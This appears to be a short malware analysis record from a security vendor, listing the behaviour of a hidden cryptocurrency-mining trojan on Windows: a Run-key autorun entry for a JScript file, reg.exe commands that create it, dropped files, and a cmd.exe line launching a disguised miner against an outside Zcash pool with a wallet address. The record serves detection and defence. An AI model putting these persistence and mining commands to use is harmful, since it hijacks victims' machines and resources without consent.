Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Msc32' = '%APPDATA%\Microsoft\msc32.js'
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\msc32.js"
- '<SYSTEM32>\reg.exe' Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Msc32" /t REG_SZ /d "%APPDATA%\Microsoft\msc32.js" /f
- '<SYSTEM32>\reg.exe' Add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Msc32" /t REG_SZ /d "%APPDATA%\Microsoft\msc32.js" /f
- '<SYSTEM32>\cmd.exe' /c"%APPDATA%\Microsoft\diskmgr.exe -x -1 -d 5 -t %NUMBER_OF_PROCESSORS%/2 -l zec-us1.dwarfpool.com:3334 -u t1f92g2rLKfY2pDk3HRPgukKea3sNRpQi3a.3a"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Microsoft\std.bat" "
- %APPDATA%\Microsoft\std.bat
- %APPDATA%\Microsoft\msc32.js
- %APPDATA%\Microsoft\diskmgr.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''